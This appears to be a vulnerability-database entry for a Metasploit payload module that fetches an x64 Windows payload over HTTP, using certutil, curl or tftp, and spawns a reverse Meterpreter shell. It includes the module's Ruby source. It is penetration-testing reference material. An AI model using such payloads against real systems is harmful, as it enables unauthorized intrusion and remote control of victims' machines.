Lucene search

K
metasploitBrendan Watters, OJ Reeves, sf <[email protected]>MSF:PAYLOAD-CMD-WINDOWS-HTTP-X64-METERPRETER_REVERSE_IPV6_TCP-
HistoryMay 18, 2023 - 3:47 p.m.

HTTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)

2023-05-1815:47:29
Brendan Watters, OJ Reeves, sf <[email protected]>
www.rapid7.com
84
metasploit
http
windows
x64
payload
fetch
execute
http server

AI Score

7.5

Confidence

Low

Fetch and execute an x64 payload from an HTTP server. Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::HTTP
  include Msf::Payload::Adapter::Fetch::WindowsOptions

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'HTTP Fetch',
        'Description' => 'Fetch and execute an x64 payload from an HTTP server.',
        'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
        'Author' => 'Brendan Watters',
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X64,
        'AdaptedPlatform' => 'win'
      )
    )
    deregister_options('FETCH_COMMAND')
    register_options(
      [
        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL TFTP CERTUTIL]])
      ]
    )
  end
end

AI Score

7.5

Confidence

Low